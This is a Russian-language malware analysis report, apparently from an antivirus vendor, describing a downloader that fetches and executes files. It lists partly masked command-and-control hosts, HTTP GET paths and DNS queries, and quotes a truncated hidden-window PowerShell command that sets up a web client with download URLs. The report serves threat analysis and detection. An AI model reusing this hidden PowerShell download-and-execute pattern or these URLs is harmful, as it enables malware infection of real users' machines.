Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Сетевая активность
Подключается к
- 'ro###-stuff.de':80
- 'bo###rmusic.com':80
- 'bo###rmusic.com':443
- 'gg###vil.com':80
- 'me####igital.net':80
- 'ju###nfic.com':80
TCP
Запросы HTTP GET
- http://ro###-stuff.de/u5mca-dy366-pgnno/
- http://bo###rmusic.com/ld9c-aj963-wvtdf/
- http://gg###vil.com/v8b-gc651-gwuo/
- http://me####igital.net/fps0hz-j943-d/
- http://ju###nfic.com/unc3b-qd364-hqur/
- http://ww##.#ustinfic.com/unc3b-qd364-hqur/
Другие
- 'bo###rmusic.com':443
UDP
- DNS ASK ro###-stuff.de
- DNS ASK bo###rmusic.com
- DNS ASK gg###vil.com
- DNS ASK me####igital.net
- DNS ASK ju###nfic.com
- DNS ASK ww##.#ustinfic.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://rough-stuff.de/u5mca-dy366-pgnno/,htt...' (со скрытым окном)
